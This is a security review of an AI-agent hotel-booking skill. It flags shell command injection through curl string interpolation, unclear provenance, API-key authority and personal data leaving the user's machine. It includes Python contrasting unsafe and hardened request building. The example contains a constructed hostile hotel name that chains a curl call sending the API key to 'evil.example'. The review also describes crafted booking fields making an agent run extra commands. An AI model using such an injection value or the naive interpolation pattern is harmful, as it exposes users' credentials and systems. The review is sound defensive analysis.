v1.0.3

Tuniu hotel booking skill

Review

ClawScan verdict for this skill. Analyzed May 1, 2026, 5:35 AM.

Analysis

This hotel-booking skill is purpose-aligned, but it warrants review: it runs raw shell curl commands that interpolate user-entered booking details, an API key, and personal information.

Guidance: Review this skill before installing. It appears designed for legitimate Tuniu hotel booking, but use it only if you trust the publisher and endpoint, keep the API key protected, avoid logging personal information, and ensure any implementation safely encodes user-provided fields instead of inserting them directly into shell commands.

Findings (4)

Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.

Abnormal behavior control

Checks for instructions or behavior that redirect the agent, misuse tools, execute unexpected code, cascade across systems, exploit user trust, or continue outside the intended task.

Tool Misuse and Exploitation
Severity: High | Confidence: Medium | Status: Concern
SKILL.md
This skill executes **curl** via **shell exec** ... the parameters are all placeholders; at call time, fill in the actual values **according to the user's current request** (city, dates, hotel ID/name, guest names, contact details, etc.)

The skill directs the agent to build and run shell commands containing user-controlled values, including names and contact data, without explicit shell/JSON escaping or a safer structured HTTP tool. A crafted value can break out of the quoted JSON body and alter the request, or append additional shell commands that run with the agent's privileges.

User impact: A malicious or malformed hotel name, traveler name, or contact field could cause unintended command behavior or an incorrect booking request.

Recommendation: Use a structured HTTP client or pass data as safely encoded JSON rather than interpolating values into a shell string; validate fields and require explicit confirmation before creating orders.
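The two patterns side by side, as an added example that is not part of the ClawScan report or of the Tuniu skill: `naive_curl_command` reproduces the interpolation the finding describes, `shell_statement_count` tokenises a command the way a POSIX shell would and counts how many separate commands it contains, and `build_booking_request` is the hardened form (validated fields, `json.dumps`, an argv list with no shell, body on stdin, explicit confirmation). The endpoint and the `apiKey` header are quoted in the report; the JSON field names, the phone-number rule and the length limits are assumptions for illustration, not Tuniu's documented schema.

```python
import json
import re
import shlex
import subprocess
import unicodedata

# Endpoint and header name are quoted in the report. The JSON field names
# below are illustrative placeholders, not Tuniu's documented schema.
ENDPOINT = "https://openapi.tuniu.cn/mcp/hotel"
PHONE_RE = re.compile(r"^\d{7,15}$")  # assumed validation rule


def naive_curl_command(api_key, hotel_name, guest_name, phone):
    """The pattern the finding describes: user values dropped into a shell
    string. Nothing escapes them, so a single quote in hotel_name ends the
    -d argument and whatever follows is parsed as further shell commands."""
    body = (f'{{"hotelName": "{hotel_name}", "guest": "{guest_name}", '
            f'"phone": "{phone}"}}')
    return f"curl -s -X POST {ENDPOINT} -H \"apiKey: {api_key}\" -d '{body}'"


def shell_statement_count(cmd):
    """Count the separate commands a POSIX shell would see in cmd, using
    shlex with shell quoting rules. One is expected; more means the data
    escaped its quotes. (Only ; && || | are counted; `#` comments and
    backslash escapes follow shlex's POSIX defaults.)"""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return 1 + sum(1 for tok in lex if tok in {";", "&&", "||", "|"})


def clean_text(value, field, max_len=100):
    """Normalise Unicode, reject empty, over-long or control-character
    values. The length limit is an assumption, not a Tuniu rule."""
    value = unicodedata.normalize("NFC", str(value)).strip()
    if not value or len(value) > max_len:
        raise ValueError(f"{field}: empty or longer than {max_len} characters")
    if any(unicodedata.category(ch).startswith("C") for ch in value):
        raise ValueError(f"{field}: control characters are not allowed")
    return value


def build_booking_request(api_key, hotel_name, guest_name, phone, confirmed=False):
    """Hardened form: validate each field, serialise with json.dumps, and
    return an argv list plus a stdin payload. No shell parses anything, so
    user data can only ever be data. `confirmed` models the explicit user
    confirmation the report asks for before an order is created."""
    if not confirmed:
        raise PermissionError("booking requires explicit user confirmation")
    if not api_key or any(c.isspace() for c in api_key):
        raise ValueError("api_key missing or malformed")
    phone = clean_text(phone, "phone", 15)
    if not PHONE_RE.match(phone):
        raise ValueError("phone: expected 7-15 digits")
    payload = json.dumps(
        {
            "hotelName": clean_text(hotel_name, "hotelName"),
            "guest": clean_text(guest_name, "guest"),
            "phone": phone,
        },
        ensure_ascii=False,
    )
    argv = [
        "curl", "-sS", "--fail-with-body", "-X", "POST", ENDPOINT,
        "-H", f"apiKey: {api_key}",
        "-H", "Content-Type: application/json",
        "--data-binary", "@-",  # body comes from stdin, never from argv
    ]
    return argv, payload


def send_booking(argv, payload):
    """Run curl with shell=False. The PII payload goes in on stdin, so it
    does not show up in process listings or a shell history."""
    result = subprocess.run(argv, input=payload.encode("utf-8"),
                            capture_output=True, check=False)
    return result.returncode, result.stdout.decode("utf-8", "replace")


if __name__ == "__main__":
    # Constructed hostile hotel name: closes the quoted body, chains a curl
    # that would leak the key, then reopens a quote so the line still parses.
    hostile = "Hyatt'; curl http://evil.example/$TUNIU_API_KEY; echo '"
    print(shell_statement_count(naive_curl_command("KEY", hostile, "Li Lei", "13800000000")))
    argv, payload = build_booking_request("KEY", hostile, "Li Lei", "13800000000", confirmed=True)
    print(json.loads(payload)["hotelName"] == hostile)
```

Under the naive pattern the constructed hostile value turns one curl invocation into three shell statements; under the hardened one the same string round-trips through JSON as an ordinary field value and never touches a shell.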
Agentic Supply Chain Vulnerabilities
Severity: Info | Confidence: High | Status: Note
metadata
Source: unknown; Homepage: none

The package provenance is not identified in the provided metadata. For an instruction-only skill that uses an API key and sends booking data externally, users should verify the publisher and endpoint.

User impact: Users have less context for deciding whether this skill is the official or intended Tuniu integration.

Recommendation: Confirm the skill publisher and the Tuniu endpoint before installing, and prefer a version with clear source and homepage metadata.
Permission boundary

Checks whether tool use, credentials, dependencies, identity, account access, or inter-agent boundaries are broader than the stated purpose.

Identity and Privilege Abuse
Severity: Low | Confidence: High | Status: Note
_meta.json
"TUNIU_API_KEY": { "type": "string", "description": "Tuniu Open Platform API key, used for the apiKey request header", "required": true }

The skill requires a Tuniu API key and uses it as delegated authority for the remote service. This is expected for the integration, but it is still account-level authority.

User impact: Anyone, or any agent flow, with access to this environment variable may be able to make Tuniu hotel API calls under the user's key.

Recommendation: Use a least-privileged API key if available, restrict and rotate it regularly, and confirm booking actions before allowing the skill to create orders.
Sensitive data protection

Checks for exposed credentials, poisoned memory or context, unclear communication boundaries, or sensitive data that could leave the user's control.

Insecure Inter-Agent Communication
Severity: Low | Confidence: High | Status: Note
SKILL.md
Personal information (contact name, mobile number, guest names, etc.) is sent via HTTP POST to Tuniu's remote MCP service (`https://openapi.tuniu.cn/mcp/hotel`)

The skill explicitly discloses that booking personal information is sent to an external MCP service. This is purpose-aligned for hotel booking, but the data is sensitive.

User impact: Traveler and contact details will leave the local agent environment and be sent to Tuniu's remote service.

Recommendation: Only provide the minimum required personal information, avoid logging PII, and verify Tuniu's privacy and booking terms before submitting an order.
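One way to honour the "avoid logging PII" recommendation, as an added example that is not part of the report or the skill: before a booking request is written to the agent's log, pass the JSON body through a redaction step that keeps enough to debug (hotel, dates, last four phone digits, first initial) and drops the rest. The field names are assumed placeholders, not Tuniu's schema.

```python
import json
import re

# Assumed field names for this example; adjust to the real request schema.
PII_FIELDS = {"guest", "contactName", "phone", "idNumber"}


def redact_for_log(payload_json):
    """Return a copy of the booking payload that is safe to log: names keep
    their first character, phone numbers keep their last four digits, any
    other PII field is replaced wholesale. Non-PII fields pass through."""
    data = json.loads(payload_json)
    for key, value in data.items():
        if key not in PII_FIELDS or not isinstance(value, str):
            continue
        if key == "phone":
            digits = re.sub(r"\D", "", value)
            data[key] = "*" * max(len(digits) - 4, 0) + digits[-4:]
        elif key in ("guest", "contactName"):
            data[key] = value[:1] + "*" * (len(value) - 1)
        else:
            data[key] = "[REDACTED]"
    return json.dumps(data, ensure_ascii=False)


if __name__ == "__main__":
    # Constructed sample body, not a real booking.
    sample = json.dumps({"hotelName": "Hyatt", "guest": "Li Lei",
                         "phone": "13800000000", "checkIn": "2026-05-10",
                         "idNumber": "110101199001011234"})
    print(redact_for_log(sample))
```

Log the redacted string, not the original; the unredacted body should exist only in the request that goes out on stdin.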